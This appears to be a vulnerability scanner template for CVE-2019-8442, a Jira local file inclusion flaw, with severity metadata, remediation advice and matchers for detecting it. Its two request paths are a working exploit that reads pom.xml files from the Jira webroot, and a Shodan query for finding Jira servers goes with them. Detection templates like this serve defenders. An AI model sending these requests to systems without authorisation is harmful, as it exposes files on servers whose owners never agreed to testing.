45 lines
1.8 KiB
YAML
45 lines
1.8 KiB
YAML
id: CVE-2019-8442
|
|
|
|
info:
|
|
name: Jira - Local File Inclusion
|
|
author: Kishore Krishna (siLLyDaddy)
|
|
severity: high
|
|
description: Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion.
|
|
impact: |
|
|
This vulnerability can result in sensitive information exposure, unauthorized access to files, and potential compromise of the Jira application.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Atlassian to mitigate the vulnerability.
|
|
reference:
|
|
- https://jira.atlassian.com/browse/JRASERVER-69241
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-8442
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2019-8442
|
|
epss-score: 0.97131
|
|
epss-percentile: 0.99752
|
|
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: atlassian
|
|
product: jira
|
|
shodan-query: http.component:"Atlassian Jira"
|
|
tags: cve,cve2019,atlassian,jira,lfi,intrusive
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
|
|
- "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- <groupId>com.atlassian.jira</groupId>
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100a98debd59fdb6340d9f3a544a30bd300b14939593b066d6c3b55b5ac6ab48ea2022100b9e55e002eff1ba65cf59d4bf61cb27827485bb265e19c23d876704bfed2869f:922c64590222798bb761d5b6d8e72950 |